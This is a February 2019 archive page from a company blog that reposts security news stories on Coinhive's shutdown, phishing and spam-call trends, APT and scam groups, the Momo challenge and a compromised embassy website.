Intelligent Connections. Powerful Impact.
Call Us: 415-510-2973

Archive for February 2019

Coinhive Monero Miner Set to Close

Coinhive Monero Miner Set to Close

Cryptocurrency mining tool Coinhive has decided to shut up shop, although not because of its rampant abuse by hackers over the past two years.

The team behind the Monero miner revealed all in a brief post on Tuesday, claiming that the 18-month project had come to an end as it was no longer economically viable.

“The drop in hash rate (over 50%) after the last Monero hard fork hit us hard. So did the ‘crash’ of the cryptocurrency market with the value of XMR depreciating over 85% within a year. This and the announced hard fork and algorithm update of the Monero network on March 9 has led us to the conclusion that we need to discontinue Coinhive,” it explained.

“Thus, mining will not be operable anymore after March 8, 2019. Your dashboards will still be accessible until April 30, 2019 so you will be able to initiate your payouts if your balance is above the minimum payout threshold.”

Although a legitimate browser-based mining tool, Coinhive sprung to notoriety quickly as it was abused by cyber-criminals around the world.

In February last year, it was found on over 4000 sites including several belonging to US and UK government agencies, after a supply chain installation.

As of December 2018, it remained the most prevalent ‘malware’ detected by Check Point for the 13th straight month, impacting 12% of organizations worldwide.

Other cryptocurrency mining software filled out the rest of the top four “most wanted” list compiled by the security vendor.

Although cryptojacking technically does not result in any data theft or serious IT operational issues, it can crash systems and — when installed on corporate servers — result in increased power consumption/charges and shorten replacement cycles for expensive kit.

Trend Micro claimed this week that detections of cryptocurrency mining malware passed the one million mark for the first time in 2018, a 237% increase from 2017 figures. However, hackers are increasingly expanding their methods of spreading these tools, to include exploit kits, plug-ins, abused ad platforms, server exploits and more, it said.

Source: Information Security Magazine

SSL-Based Phishing Surges 400% from 2017

SSL-Based Phishing Surges 400% from 2017

Hackers are increasingly using encrypted traffic to hide their attacks from security filters, with phishing emails soaring in popularity, according to new data from Zscaler.

The cloud security provider processes more than 60 billion transactions per day and claimed that hiding threats in SSL traffic has become standard practice among the black hats.

Its biannual 2019 Cloud Security Insights Threat Report revealed that the vendor blocked 1.7 billion advanced threats hidden in SSL traffic from July to December 2018, amounting to an average of 283 million per month.

This included 2.7 million phishing attempts each month, an increase of over 400% from 2017 figures.

This chimes somewhat with a new report from Trend Micro released this week, which revealed the vendor blocked 269 million phishing URLs last year, a 269% increase over 2017.

Other malicious activity blocked by Zscaler in the second half of 2018 included 32 million botnet callback attempts per month, and 240,000 browser exploitation attempts. In addition, nearly 32% of newly registered domains blocked by the firm were ‘protected’ with SSL encryption.

Zscaler CTO, Amit Sinha, argued that the trend towards having everything encrypted by default is great for user privacy, but it presents a challenge to security teams.

“Decrypting, inspecting, and re-encrypting traffic is non-trivial, causing significant performance degradation on traditional security appliances, and most organisations are not equipped to inspect encrypted traffic at scale,” he added. “With a high percentage of threats now delivered with SSL encryption, and over 80% of internet traffic now encrypted, enterprises are blind to over half of malware sent to their employees.”

Zscaler also noted an increase in SSL-based JavaScript skimming attacks on e-commerce sites, a reference to the growing number of bad actors using Magecart code to harvest shoppers' card details as they are entered in. Popular brands including BA, Ticketmaster and Newegg have already been breached this way.

“With the increase in JavaScript skimmer-based attacks, criminals can conduct their nefarious activity within the confines of the SSL environment, leaving most e-commerce sites unaware of the activity,” warned Zscaler VP of security research, Deepen Desai.

Source: Information Security Magazine

Global Spam Calls Hit 85 Billion in 2018

Global Spam Calls Hit 85 Billion in 2018

Global spam calls have soared by 325% over 2018 to reach a staggering 85 billion worldwide, according to new findings from Hiya.

The Caller ID company claimed in its first Global Robocall Radar report that spam rates in Spain (24%), the UK (22%), Italy (21%) and France (20%) are the highest in the world.

These are more than mere nuisance calls: Hiya claimed that they can expose victims to serious fraud attempts.

The top four types of voice spam campaign listed include bank account scams in which the caller pretends to be a representative of the recipient’s bank with the aim of gaining account details, and “neighbor scams” in which the caller pretends to be a nearby friend or business, aided by VoIP software that spoofs their phone numbers.

The wangiri or one-ring scam sees the fraudsters call just once and in so doing entice users into calling back to premium rate international numbers owned by the scammer. Some robocalls even demand payment from random phone users for the return of a ‘kidnapped’ family member or friend.

However, the various tactics used around the world vary from country to country. In the UK, robocalls selling fake payment protection insurance (PPI) are popular, as are malware-laden SMS messages spoofed to appear as if sent from HMRC.

In the US, calls pretending to come from the IRS and neighbor scams are popular, according to the report.

New rules introduced in September by UK regulator Ofcom could help to mitigate the threat from such spam calls.

They've banned phone companies from charging for the Caller ID service that helps users screen their calls and mandate that any phone numbers displayed to users must be valid and can be called back.

Phone companies have also been forced to block calls with invalid numbers and Ofcom now has the power to take back whole blocks of numbers from telcos if they’ve been used repeatedly to carry out nuisance calls and fraud.

Source: Information Security Magazine

Threat Report Tries to Change Security's Narrative

Threat Report Tries to Change Security's Narrative

Over the course of the second half of 2018, criminally motivated attackers were able to cause significant damage to enterprises without their knowledge by using not-so-sophisticated attacks, according to a new report from Gigamon.

Not surprisingly, the report found that the top three malware threats of 2018 were Emotet, LokiBot and TrickBot. While these malware threats seemed to be vying for position of most prevalent in the middle of the year, attackers increased their use of Emotet, which turned out to be the front-runner by the year’s end, according to the report.

"Most notably, Emotet’s rapid increase began in early November 2018, which continued through late December 2018. During this time, Emotet campaigns appeared daily with different attachment hashes, different attachment filenames and different email subject lines. On or about 21 December 2018, Emotet went silent and remained silent through the first weeks of 2019."

Despite its being widely known in the security industry as the top threat and the most frequently delivered malware, Emotet is still able to evade detection, which is one reason why the report advised that CISOs should be aware of the malware’s ability to steal sensitive corporate information.

"Due to Emotet’s polymorphic nature, it is difficult to detect by signatures alone, so organizations must be able to identify Emotet’s network communications behaviors to mitigate its rapid proliferation. Security teams should examine both north/south C2 communications as well as east/west lateral communications."

LokiBot also proved useful in business email compromise, as once it was installed, attackers were able to execute other malicious code. "Attackers tied to the ransomware outbreak in the Ukraine targeting major banks, utilities and telcos also installed a variant of LokiBot to not only make the compromised machine inoperable, but to also steal credentials and information."

According to the report, one objective of the research was to change the cybersecurity narrative by educating CISOs on how to mitigate these prevalent threats. To that end, the report advised that CISOs be dedicated to studying the behavior of successful threats, and apply known research in the development of a robust set of indicators and detection mechanisms. When security teams are able to leverage new indicators and detection mechanisms across comprehensive network visibility, they are better positioned to use gained insight that will enable them to reduce risk.

Source: Information Security Magazine

Scarlet Widow Targets K-12 Schools, Nonprofits

Scarlet Widow Targets K-12 Schools, Nonprofits

A gang of known scammers allegedly based in Nigeria is believed to be targeting schools in the K-12 sector along with the Boy Scouts and other nonprofit organizations around the world, according to a report published by Agari.

The group has been named "Scarlet Widow," and the most recent report reveals a new pattern of attacks targeting nonprofit organizations, K-12 school districts, and universities – using a directory scraping technique the Scarlet Widow gang calls 'bombing.' The group has also been identified as targeting single men and women with romance scams in early February. 

Using email fraud attacks, Scarlet Widow appears to go after some of the more vulnerable organizations around the globe, including dozens of small-town schools and school districts in Indiana and Wisconsin. Attackers have also reportedly gone after US and UK-based nonprofits including Boy Scouts of America and the Salvation Army as well as universities in Florida, the UK, New Zealand and Australia, Agari found.

"When Scarlet Widow goes after nonprofits, the group primarily uses publicly-accessible websites to scrape contact information for employees," wrote Crane Hassold, Agari's Senior Director of Threat Research. "Working off a list of identified websites that contain directories of nonprofit organizations, Scarlet Widow uses a web scraper to traverse the online directory and collect email addresses associated with each organization—a process they refer to as 'bombing' an online directory."

The attackers leverage business email compromise tactics to target the organizations ranging from a chapter of the United Way, a Texas-based ballet foundation, a North Carolina physician, an Archdiocese of the Catholic Church in the Midwest, and several chapters of the YMCA. An investigation revealed that Scarlet Widow had collected information from more than 30,000 individuals at 13,000 organizations across 12 different countries.

The Scarlet Widow scammers have reportedly been using a peer-to-peer cryptocurrency exchange, Paxful, to convert fake gift cards into cryptocurrency. In investigating Scarlet Widow, researchers found that, "By first advertising the stolen cards on Paxful, the group can successfully turn them into bitcoin, which they can then trade on Remitano for a specified price. Once the Scarlet Widow actors have exchanged their bitcoin and the buyer’s funds are in their bank account, the process of converting illicit gift cards into cash is complete."

Source: Information Security Magazine

APT Uses Arsenal of Tools to Evade Detection

APT Uses Arsenal of Tools to Evade Detection

The advanced persistent threat (APT) group known since 2013 as BRONZE UNION, as well as Emissary Panda, APT 27 and LuckyMouse, is believed to be based in China, according to Secureworks.

Published today, the State of the [BRONZE] UNION Snapshot and A Peek into BRONZE UNION’S Toolbox, are based on nearly two years of continuous,in-depth visibility of the group’s threat campaigns.  

Researchers have tracked the group’s activities, including its persistent and long-term approach to espionage, and their analysis of network compromises suggests that since 2016 BRONZE UNION has been using a range of capabilities and tactics to target data mostly from political, technology, manufacturing and humanitarian organizations.

Focused on espionage activities, the threat group’s tactics ranged from stealing data about cutting-edge weapons technologies to spying on dissidents and other civilian groups, according to researchers.

Using stolen credentials, the threat actors have been able to compromise business email accounts and then use that access to perform different tasks from keyword searches to downloading email attachments and data.

The arsenal of intrusion methods and tools used by the group have been problematic for defenders as the sophisticated skills of the attacks allows them to evade common security tools and escalate their privileges, according to the report.

The group often uses services, tools and credentials native to the compromised environment, a technique commonly known as living off the land. "After obtaining access to a network, the threat actors are diligent about maintaining access to high-value systems over long periods of time,” researchers wrote.

A distinguishing pattern of the BRONZE UNION activity is that they seem to have a routing maintenance schedule where they return to compromised networks every three months. Researchers suspect that this schedule aligns with the time frame many organizations use to force password changes.

“The threat actors have access to a wide range of tools, so they can operate flexibly and select tools appropriate for intrusion challenges. During complex intrusion scenarios, the threat actors leverage their proprietary tools, which offer custom functionality and lower detection rates.”

Source: Information Security Magazine

Malicious Suicide Game, Momo Challenge, Targets Kids

Malicious Suicide Game, Momo Challenge, Targets Kids

Police in Northern Ireland and National Online Safety have issued warnings to parents regarding the disturbing and potentially dangerous Momo Challenge that has resurfaced in social media apps, including WhatsApp and YouTube Kids.

According to a report from Mirror, hackers have spliced images of Momo into children’s videos, including Peppa Pig and Fortnite. The images share a number for users to text to connect with Momo on WhatsApp, at which point the hackers engage with users asking them to perform seemingly meaningless tasks. The requests eventually become quite eerie, though.

“Momo is a sinister ‘challenge’ that has been around for some time. It has recently resurfaced and once again has come to the attention of schools and children across the country. Dubbed the ‘suicide killer game,’ Momo has been heavily linked with apps such as Facebook, WhatsApp, YouTube, and most recently (and most worryingly)…YouTube Kids,” National Online Safety warned.

The frightening figure is that of a doll with bulging eyes and powder-white skin who reportedly shares disturbing graphic images both depicting violence and asking recipients to partake in dangerous challenges.

According to PediMom, a parenting blog, when the challenge surfaced several months ago, a mother reported that her child was watching a YouTube Kids video when “four minutes and forty-five seconds into the video. The man quickly walked in, held his arm out, and tracing his forearm, said, 'Kids, remember, cut this way for attention, and this way for results,' and then quickly walked off.”

Resoundingly, the message from police is that parents assure their children that this challenge – and others similar to it – are not real. Hackers are believed to be using Momo as a way to harvest information from participants.

A spokesperson for the NSPCC in Northern Ireland told the BBC, "The constantly evolving digital world means a steady influx of new apps and games and can be hard for parents to keep track of. That's why it's important for parents to talk regularly with children about these apps and games and the potential risks they can be exposed to.”

The NSPCC also issued a warning on its Facebook page advising parents to monitor their children's online time and supervise them when playing games or watching videos. NSPCC noted, "This game conceals itself within other harmless looking games played by our kids! There has also been reports of parts of the game being viewable on YouTube…when downloaded tells your child to communicate with them via WhatsApp and a number of other widely used apps. "Momo" then tells your child to self harm or she will put a curse on them!"

Source: Information Security Magazine

Hackers Exploit Bangladesh Embassy in Cairo Site

Hackers Exploit Bangladesh Embassy in Cairo Site

Attackers have been exploring new forms of phishing bait that will entice users to click and have reportedly had success exploiting Bangladesh's Cairo embassy website, according to researchers at Trustwave.

Research conducted at the end of October 2018 revealed that the Coinlmp web miner created a block for a government facility domain. Only two months later, the threat team detected a Microsoft Word document with an embedded malicious EPS script for the same domain. According to today’s blog post, the office document contains an EPS file and exploits a use-after-free vulnerability, CVE-2017-0261.

Detection rates for the malicious page were low,. However, when researchers tried to access most of the webpages on the site, they were prompted to save a file instead, indicating that malicious actors were controlling the embassy's website.

Credit: Trustwave
Credit: Trustwave

“We contacted the compromised domain in an attempt to alert them of the infection, unfortunately we received no response and at the time of publishing this blog the site remains infected,” researchers wrote.

Through their analysis, researchers noted that the file appeared to have been modified in October 2018, adding, “It’s possible that after running a wider infection campaign infecting sites with a web miner, the attacker looked through their victims to find more interesting targets to leverage further.”

The file then exploits the vulnerability CVE-2017-7255, which enables privilege escalation for the execution of the main payload, the Godzilla loader. Additional executables can be dropped by the attacker after establishing communication with the C2 server. In this case, the researchers identified an additional downloader using a cryptominer payload.

Source: Information Security Magazine

Trend Micro Blocks Over 48 Billion Threats in 2018

Trend Micro Blocks Over 48 Billion Threats in 2018

BEC, cryptojacking, phishing and fileless malware attacks all surged in 2018 as cyber-criminals increasingly moved away from one-size-fits-all approaches, according to Trend Micro.

The security vendor’s 2018 roundup report, Caught in the Net: Unraveling the Tangle of Old and New Threats, revealed it blocked over 48.3 billion threats over the 12 month period.

The vast majority of these (41.5 billion) were email borne.

They included over 269 million instances of phishing URL detections compared to 2017, a 269% increase. Also targeting users with social engineering is BEC, of which Trend Micro detected an extra 28% attempted attacks.

Cryptojacking detections passed the one million mark for the first time, a 237% increase from 2017 figures, with attack methods spread out across: abused ad platforms; pop-up ads; server exploits malicious browser extensions; mobile phones; plug-ins; botnets; bundling with legitimate software; exploit kits; and repurposed ransomware.

Fileless techniques showed the biggest rise in detections, up 819% over the year. The vendor warned that these attacks, which typically try to circumvent traditional filters, can usually be detected only via other means such as traffic monitoring, behavioral indicators or sandboxing.

Another trend is of cyber-criminals continuing to focus on exploiting known vulnerabilities rather than spending time and money on researching zero days. Trend Micro’s Zero Day Initiative (ZDI) bought and disclosed more vulnerabilities in 2018 than ever before.

“This reverse strategy of first studying a disclosed vulnerability, even if it has been patched in the same advisory, then developing an exploit for it has become quite common over the years,” the report noted. “But it appears that cyber-criminals are correct in assuming that not all enterprises will be able to patch their systems in time, if at all.”

The ZDI also bought and disclosed 224% more Industrial Control System bugs in 2018 including many in these systems’ Human Machine Interfaces (HMIs), which should be a concern for those managing operational technology environments.

Trend Micro noted a 91% decrease in ransomware threats over the year and a 32% drop in new ransomware families, but warned that it still remains a serious threat.  

Interestingly, the number of threats blocked was down from 2017 (66.4 billion) and 2016 (81 billion) figures: perhaps an indication that they’re becoming more targeted.

Source: Information Security Magazine

Most UK IT Security Leaders Fear CNI Attack

Most UK IT Security Leaders Fear CNI Attack

Over half of organizations believe the UK is heading for a major attack on critical infrastructure (CNI) this year, with siloed teams causing dangerous security gaps between IT and OT functions, according to Infosecurity Europe.

The region’s leading information security event polled over 12,000 social media followers and its community of CISOs to better understand the challenges facing organizations in CNI sectors.

Some 59% agreed that a CNI attack was imminent in 2019, echoing National Cyber Security Centre (NCSC) boss Ciaran Martin, who said last year that the nation’s first category one (C1) attack was a matter of “when, not if.” WannaCry was rated a C2 incident.

Of equal concern is the fact that organizations seem ill-prepared to deal with such an attack.

Over two thirds (68%) of respondents claimed that security teams in charge of physical and digital systems never collaborate. These siloes can be particularly damaging as IT and OT converge, for example with the proliferation of IoT in heavy industry.

“The increasing convergence of cyber and physical environments is inevitable, but managing them in a cohesive way will strengthen enterprise security,” argued Just Eat CISO, Kevin Fielder.

“Those intent on accessing money, information or IP will often find it easier to do so from the inside – and we’re moving to a world where this can mean immediate impact on life. Hacking a building’s management systems, for example, could suppress a fire alarm or sprinkler system, or prevent people leaving.”

The poll also revealed that just 16% of respondents were aware of the NIS Directive, an EU law now in force which aims to improve baseline security among firms in CNI sectors. Non-compliance could incur fines as high as the GDPR.

“I can’t believe that any cybersecurity leader in a sector impacted by the NIS Directive would be unaware of its implications for their business,” argued Nigel Stanley, CTO of TÜV Rheinland.

“Lack of commitment to secure critical infrastructure is the worst sort of negligence. Forget what the regulators demand — organizations should take the initiative and secure assets based on a proportionate cybersecurity and business-led risk assessment.”

Infosecurity Europe will take place at London Olympia in Hammersmith from June 4-6, 2019.

Source: Information Security Magazine